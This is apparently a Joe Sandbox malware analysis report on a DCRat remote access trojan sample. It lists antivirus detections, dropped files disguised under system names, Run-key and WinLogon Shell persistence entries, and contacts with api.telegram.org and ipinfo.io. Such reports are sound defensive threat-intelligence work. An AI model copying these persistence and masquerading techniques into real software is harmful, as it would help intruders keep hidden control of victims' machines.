processes 8->27 91 Antivirus detection for dropped file 13->91 93 Multi AV Scanner detection for dropped file 13->93 95 Machine Learning detection for dropped file 13->95 file6 signatures7 process8 file9 77 Uses ping.exe to sleep 19->77 79 Uses ping.exe to check the status of other devices and networks 19->79 43 4 other processes 19->43 47 C:\Program Files (x86)\...\msedge.exe, PE32 22->47 dropped 81 Infects executable files (exe, dll, sys, html) 22->81 29 conhost.exe 22->29         started        31 cvtres.exe 1 22->31         started        49 C:\Windows\...\SecurityHealthSystray.exe, PE32 25->49 dropped 33 conhost.exe 25->33         started        35 cvtres.exe 1 25->35         started        83 Loading BitLocker PowerShell Module 27->83 37 conhost.exe 27->37         started        39 conhost.exe 27->39         started        41 conhost.exe 27->41         started        45 4 other processes 27->45 signatures10 process11

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            LzmJLVB41K.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            LzmJLVB41K.exe100%AviraHEUR/AGEN.1323342
                            LzmJLVB41K.exe100%Joe Sandbox ML

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\Program Files (x86)\AutoIt3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe100%AviraHEUR/AGEN.1323342
                            C:\Program Files (x86)\AutoIt3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe100%AviraHEUR/AGEN.1323342
                            C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe100%AviraHEUR/AGEN.1323342
                            C:\Recovery\ctfmon.exe100%AviraHEUR/AGEN.1323342
                            C:\Users\user\AppData\Local\Temp\Kg1DnkFEGg.bat100%AviraBAT/Delbat.C
                            C:\Program Files (x86)\AutoIt3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\AutoIt3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe100%Joe Sandbox ML
                            C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe100%Joe Sandbox ML
                            C:\Recovery\ctfmon.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\AutoIt3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Recovery\ctfmon.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Recovery\fozAQGvSmfTQIywuzSgk.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\KlfRTWYv.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\PYxQwTnj.log4%ReversingLabs
                            C:\Users\user\Desktop\QMBYhgjh.log24%ReversingLabs
                            C:\Users\user\Desktop\rUslzROg.log5%ReversingLabs
                            C:\Users\user\Desktop\yRglcgIV.log8%ReversingLabs
                            C:\Users\user\Desktop\zxBbjKdN.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat

                            Unpacked PE Files

                            No Antivirus matches

                            Domains

                            No Antivirus matches

                            URLs

                            No Antivirus matches

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            ipinfo.io
                            		34.117.59.81
                            		truefalse
                              		high
                              api.telegram.org
                              		149.154.167.220
                              		truefalse
                                		high

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                https://ipinfo.io/countryfalse
                                  		high
                                  https://ipinfo.io/ipfalse
                                    		high

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://nuget.org/NuGet.exepowershell.exe, 00000022.00000002.3739159881.00000164728F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.3723381092.0000024128057000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.3741199181.00000277462C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.3637871775.0000019BBDC77000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.3722297337.000001E46C287000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://api.telegram.orgLzmJLVB41K.exe, 00000000.00000002.2317415520.00000000033F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000002B.00000002.2446559445.000001E45C462000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://api.telegram.org/botLzmJLVB41K.exe, 00000000.00000002.2309885143.00000000015A2000.00000002.00000001.01000000.00000000.sdmp, LzmJLVB41K.exe, 00000000.00000002.2317415520.00000000033F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000022.00000002.2447636860.0000016462AA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2450393544.0000019B544F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2439053732.0000024118207000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2438216761.0000027736478000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2433495607.0000019BADE29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2446559445.000001E45C462000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000002B.00000002.2446559445.000001E45C462000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://ipinfo.ioLzmJLVB41K.exe, 00000000.00000002.2317415520.00000000037CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000022.00000002.2447636860.0000016462AA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2450393544.0000019B544F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2439053732.0000024118207000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2438216761.0000027736478000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2433495607.0000019BADE29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2446559445.000001E45C462000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://contoso.com/powershell.exe, 0000002B.00000002.3722297337.000001E46C287000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://nuget.org/nuget.exepowershell.exe, 00000022.00000002.3739159881.00000164728F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.3784312347.0000019B64346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.3723381092.0000024128057000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.3741199181.00000277462C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.3637871775.0000019BBDC77000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.3722297337.000001E46C287000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://contoso.com/Licensepowershell.exe, 0000002B.00000002.3722297337.000001E46C287000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://contoso.com/Iconpowershell.exe, 0000002B.00000002.3722297337.000001E46C287000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://aka.ms/pscore68powershell.exe, 00000022.00000002.2447636860.0000016462881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2450393544.0000019B542D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2439053732.0000024117FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2438216761.0000027736251000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2433495607.0000019BADC01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2446559445.000001E45C211000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePpowershell.exe, 00000022.00000002.2447636860.0000016462881000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://api.telegram.orgLzmJLVB41K.exe, 00000000.00000002.2317415520.000000000342E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameLzmJLVB41K.exe, 00000000.00000002.2317415520.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, LzmJLVB41K.exe, 00000000.00000002.2317415520.00000000031BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2450393544.0000019B542D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2439053732.0000024117FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2438216761.0000027736251000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2433495607.0000019BADC01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2446559445.000001E45C211000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://github.com/Pester/Pesterpowershell.exe, 0000002B.00000002.2446559445.000001E45C462000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://ipinfo.ioLzmJLVB41K.exe, 00000000.00000002.2317415520.00000000031BD000.00000004.00000800.00020000.00000000.sdmp, LzmJLVB41K.exe, 00000000.00000002.2317415520.00000000037B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high

                                                                        World Map of Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public IPs

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        149.154.167.220
                                                                        		api.telegram.orgUnited Kingdom
                                                                        		62041TELEGRAMRUfalse
                                                                        34.117.59.81
                                                                        		ipinfo.ioUnited States
                                                                        		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse

                                                                        General Information

                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1557447
                                                                        Start date and time:2024-11-18 09:16:07 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 10m 42s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:56
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Sample name:LzmJLVB41K.exe
                                                                        renamed because original name is a hash value
                                                                        Original Sample Name:2d756772bc00e5778d794c107358ddf7.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.spre.troj.expl.evad.winEXE@49/66@3/2
                                                                        EGA Information:Failed
                                                                        HCA Information:Failed
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe

                                                                        Warnings

                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, schtasks.exe
                                                                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fbiopenup.top, fe3cr.delivery.mp.microsoft.com
                                                                        • Execution Graph export aborted for target LzmJLVB41K.exe, PID 2016 because it is empty
                                                                        • Execution Graph export aborted for target LzmJLVB41K.exe, PID 432 because it is empty
                                                                        • Execution Graph export aborted for target ctfmon.exe, PID 1220 because it is empty
                                                                        • Execution Graph export aborted for target ctfmon.exe, PID 7020 because it is empty
                                                                        • Execution Graph export aborted for target fozAQGvSmfTQIywuzSgk.exe, PID 3192 because it is empty
                                                                        • Execution Graph export aborted for target fozAQGvSmfTQIywuzSgk.exe, PID 3648 because it is empty
                                                                        • Execution Graph export aborted for target fozAQGvSmfTQIywuzSgk.exe, PID 7884 because it is empty
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                        • VT rate limit hit for: LzmJLVB41K.exe

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        TimeTypeDescription
                                                                        03:17:10API Interceptor36x Sleep call for process: LzmJLVB41K.exe modified
                                                                        03:17:17API Interceptor132x Sleep call for process: powershell.exe modified
                                                                        09:17:06Task SchedulerRun new task: fozAQGvSmfTQIywuzSgk path: "C:\Recovery\fozAQGvSmfTQIywuzSgk.exe"
                                                                        09:17:06Task SchedulerRun new task: fozAQGvSmfTQIywuzSgkf path: "C:\Recovery\fozAQGvSmfTQIywuzSgk.exe"
                                                                        09:17:08Task SchedulerRun new task: ctfmon path: "C:\Recovery\ctfmon.exe"
                                                                        09:17:08Task SchedulerRun new task: ctfmonc path: "C:\Recovery\ctfmon.exe"
                                                                        09:17:08Task SchedulerRun new task: fontdrvhost path: "C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe"
                                                                        09:17:09Task SchedulerRun new task: fontdrvhostf path: "C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe"
                                                                        09:17:10AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run fozAQGvSmfTQIywuzSgk "C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe"
                                                                        09:17:11Task SchedulerRun new task: LzmJLVB41K path: "C:\Users\user\Desktop\LzmJLVB41K.exe"
                                                                        09:17:11Task SchedulerRun new task: LzmJLVB41KL path: "C:\Users\user\Desktop\LzmJLVB41K.exe"
                                                                        09:17:19AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ctfmon "C:\Recovery\ctfmon.exe"
                                                                        09:17:28AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run fontdrvhost "C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe"
                                                                        09:17:37AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run LzmJLVB41K "C:\Users\user\Desktop\LzmJLVB41K.exe"
                                                                        09:17:46AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run fozAQGvSmfTQIywuzSgk "C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe"
                                                                        09:17:55AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ctfmon "C:\Recovery\ctfmon.exe"
                                                                        09:18:04AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run fontdrvhost "C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe"
                                                                        09:18:12AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run LzmJLVB41K "C:\Users\user\Desktop\LzmJLVB41K.exe"
                                                                        09:18:21AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run fozAQGvSmfTQIywuzSgk "C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe"
                                                                        09:18:30AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run ctfmon "C:\Recovery\ctfmon.exe"
                                                                        09:18:39AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run fontdrvhost "C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe"
                                                                        09:18:47AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run LzmJLVB41K "C:\Users\user\Desktop\LzmJLVB41K.exe"
                                                                        09:19:05AutostartRun: WinLogon Shell "C:\Recovery\fozAQGvSmfTQIywuzSgk.exe"
                                                                        09:19:13AutostartRun: WinLogon Shell "C:\Recovery\ctfmon.exe"
                                                                        09:19:22AutostartRun: WinLogon Shell "C:\Program Files (x86)\autoit3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe"
                                                                        09:19:30AutostartRun: WinLogon Shell "C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe"
                                                                        09:19:38AutostartRun: WinLogon Shell "C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe"
                                                                        09:19:47AutostartRun: WinLogon Shell "C:\Users\user\Desktop\LzmJLVB41K.exe"

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        149.154.167.220TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 11-18-2024_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          rCEMG242598.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            Pagamento,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              yF21ypxRB7.exeGet hashmaliciousXWormBrowse
                                                                                PayeeAdvice_HK54912_R0038704_37504.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                  Order88983273293729387293828PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                    download.exeGet hashmaliciousRemcos, XWormBrowse
                                                                                      TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        Order88983273293729387293828PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          https://t.ly/-kxCOGet hashmaliciousBraodoBrowse
                                                                                            34.117.59.81FormulariomillasbonusLATAM_GsqrekXCVBmUf.cmdGet hashmaliciousUnknownBrowse
                                                                                            • ipinfo.io/json
                                                                                            172.104.150.66.ps1Get hashmaliciousUnknownBrowse
                                                                                            • ipinfo.io/json
                                                                                            VertusinstruccionesFedEX_66521.zipGet hashmaliciousUnknownBrowse
                                                                                            • ipinfo.io/json
                                                                                            UjbjOP.ps1Get hashmaliciousUnknownBrowse
                                                                                            • ipinfo.io/json
                                                                                            I9xuKI2p2B.ps1Get hashmaliciousUnknownBrowse
                                                                                            • ipinfo.io/json
                                                                                            licarisan_api.exeGet hashmaliciousIcarusBrowse
                                                                                            • ipinfo.io/ip
                                                                                            build.exeGet hashmaliciousUnknownBrowse
                                                                                            • ipinfo.io/ip
                                                                                            YjcgpfVBcm.batGet hashmaliciousUnknownBrowse
                                                                                            • ipinfo.io/json
                                                                                            lePDF.cmdGet hashmaliciousUnknownBrowse
                                                                                            • ipinfo.io/json
                                                                                            6Mpsoq1.php.ps1Get hashmaliciousUnknownBrowse
                                                                                            • ipinfo.io/json

                                                                                            Domains

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            ipinfo.io2h2xLB9h1L.lnkGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                            • 34.117.59.81
                                                                                            bose2scut18.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                            • 34.117.59.81
                                                                                            18cut04.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                            • 34.117.59.81
                                                                                            bose1511mkt.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                            • 34.117.59.81
                                                                                            https://ow.ly/ok9750U8Nry#jeanette.marais@mmltd.co.zaGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                                                                            • 34.117.59.81
                                                                                            704b67b5-6bc9-dbd5-0710-60eb98e03983.emlGet hashmaliciousUnknownBrowse
                                                                                            • 34.117.59.81
                                                                                            OBS-Studio-30.2.3-Windows-Installer.exeGet hashmaliciousUnknownBrowse
                                                                                            • 34.117.59.81
                                                                                            https://www.bing.com/ck/a?!&&p=35f7ac11749086c457664a8010a84bc638d369283c719578d3701e6e769d80e3JmltdHM9MTczMDg1MTIwMA&ptn=3&ver=2&hsh=4&fclid=33680f6e-3a94-6c3f-27a6-1a423bb96ddc&psq=site%3Ahttps%3A%2F%2FChiefOfStaff.site&u=a1aHR0cHM6Ly93d3cuY2hpZWZvZnN0YWZmLnNpdGUvd2hhdC1hcmUtdGhlLWtleS1wcmluY2lwbGVzLW9mLW9wZXJhdGlvbnMtbWFuYWdlbWVudA#taehwan.lee@hdel.co.krGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                                                                            • 34.117.59.81
                                                                                            https://www.google.com/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=rqjkphmdlmFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Ftao.bb/RTupG#dGFla3l1LmtpbUBoeXVuZGFpZWxldmF0b3IuY29tGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 34.117.59.81
                                                                                            Sara.exe.bin.exeGet hashmaliciousUnknownBrowse
                                                                                            • 34.117.59.81
                                                                                            api.telegram.orgTEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 11-18-2024_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            rCEMG242598.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            Pagamento,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            yF21ypxRB7.exeGet hashmaliciousXWormBrowse
                                                                                            • 149.154.167.220
                                                                                            PayeeAdvice_HK54912_R0038704_37504.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            Order88983273293729387293828PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            download.exeGet hashmaliciousRemcos, XWormBrowse
                                                                                            • 149.154.167.220
                                                                                            TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            Order88983273293729387293828PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            dekont_7083037 T#U00dcRK#U0130YE HALK BANKASI A.#U015e pdf .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 149.154.167.220

                                                                                            ASNs

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            TELEGRAMRUUnlock_Tool_v2.6.5.exeGet hashmaliciousStealc, VidarBrowse
                                                                                            • 149.154.167.99
                                                                                            TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 11-18-2024_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            rCEMG242598.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            Pagamento,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            yF21ypxRB7.exeGet hashmaliciousXWormBrowse
                                                                                            • 149.154.167.220
                                                                                            PayeeAdvice_HK54912_R0038704_37504.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            Order88983273293729387293828PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            download.exeGet hashmaliciousRemcos, XWormBrowse
                                                                                            • 149.154.167.220
                                                                                            TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            Order88983273293729387293828PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfile.exeGet hashmaliciousCredential FlusherBrowse
                                                                                            • 34.117.188.166
                                                                                            file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                            • 34.117.188.166
                                                                                            https://ow.ly/ok9750U8Nry#jeanette.marais@mmltd.co.zaGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                                                                            • 34.117.59.81
                                                                                            file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                            • 34.117.188.166
                                                                                            file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                            • 34.117.188.166
                                                                                            file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                            • 34.117.188.166
                                                                                            file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                            • 34.117.188.166
                                                                                            file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                            • 34.117.188.166
                                                                                            file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                            • 34.117.188.166
                                                                                            file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                            • 34.117.188.166

                                                                                            JA3 Fingerprints

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            3b5074b1b5d032e5620f69f9f700ff0e2h2xLB9h1L.lnkGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                            • 149.154.167.220
                                                                                            • 34.117.59.81
                                                                                            SOA.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            • 149.154.167.220
                                                                                            • 34.117.59.81
                                                                                            13jhsfbose.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                            • 149.154.167.220
                                                                                            • 34.117.59.81
                                                                                            kQ3WxQb6bw.lnkGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.220
                                                                                            • 34.117.59.81
                                                                                            36yw96m7Ni.lnkGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.220
                                                                                            • 34.117.59.81
                                                                                            scut18bo03.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                            • 149.154.167.220
                                                                                            • 34.117.59.81
                                                                                            TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 11-18-2024_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            • 34.117.59.81
                                                                                            bose2scut18.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                            • 149.154.167.220
                                                                                            • 34.117.59.81
                                                                                            18cut04.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                            • 149.154.167.220
                                                                                            • 34.117.59.81
                                                                                            bose1511mkt.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                            • 149.154.167.220
                                                                                            • 34.117.59.81

                                                                                            Dropped Files

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            C:\Users\user\Desktop\KlfRTWYv.logT0jSGXdxX5.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                              s5duotgoYD.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                main.exeGet hashmaliciousDCRat, Discord Token Stealer, Millenuim RAT, PureLog Stealer, zgRATBrowse
                                                                                                  file_1443.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                    lsass.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                      t8xf0Y1ovi.exeGet hashmaliciousDCRatBrowse
                                                                                                        QMT2731i8k.exeGet hashmaliciousDCRatBrowse
                                                                                                          TGh6AUbQkh.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            2VaAObAYLP.exeGet hashmaliciousDCRatBrowse
                                                                                                              dvc2TBOZTh.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                                                                                Created / dropped Files

                                                                                                                C:\Program Files (x86)\AutoIt3\SciTE\api\94dd0fcc3d3f01

                                                                                                                Download File
                                                                                                                Process:C:\Users\user\Desktop\LzmJLVB41K.exe
                                                                                                                File Type:ASCII text, with very long lines (425), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):425
                                                                                                                Entropy (8bit):5.843600917111957
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:0Tpr9kWLCCTjzcpvV2lYW7aaqub6QhJF7ioNVG:0NraWLxTjzcGnaaqubnUJ
                                                                                                                MD5:9C3789AEA889385FA8BA4DF3EDBBD276
                                                                                                                SHA1:7E2996401C8916FA50FC85191FB527713E316AD9
